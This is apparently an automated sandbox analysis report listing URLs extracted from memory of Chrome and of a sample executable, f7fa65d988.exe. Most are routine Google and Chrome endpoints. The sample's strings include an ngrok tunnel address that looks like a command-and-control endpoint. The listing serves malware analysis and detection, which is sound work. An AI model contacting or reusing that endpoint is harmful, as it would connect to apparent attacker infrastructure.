Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000009.00000002.2847637335.000028F0009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000009.00000002.2834089663.000028F000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846882643.000028F00081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845602419.000028F0005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369H
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2845551588.000028F000590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000009.00000002.2845551588.000028F000590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icome
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000009.00000002.2845789225.000028F0005EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000009.00000002.2834380389.000028F0000FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/websto
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000009.00000002.2845650113.000028F0005C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848098680.000028F000AC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846771011.000028F0007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847714446.000028F0009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847862323.000028F000A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000009.00000002.2846771011.000028F0007DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enCw
Source: chrome.exe, 00000009.00000003.2822900885.000028F000CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2824993942.000028F000D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2838152377.000028F000328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822949727.000028F000D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000009.00000002.2834698990.000028F00018C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000009.00000002.2849332546.000028F000C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000009.00000003.2792606965.000031B4002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2792587816.000031B4002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000009.00000002.2834303599.000028F0000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846367779.000028F000704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845912698.000028F000628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx8
Source: chrome.exe, 00000009.00000002.2848328370.000028F000B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b(
Source: chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845871601.000028F00060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000009.00000002.2837985975.000028F00031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actionsManage
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000009.00000002.2837985975.000028F00031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000009.00000002.2837985975.000028F00031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
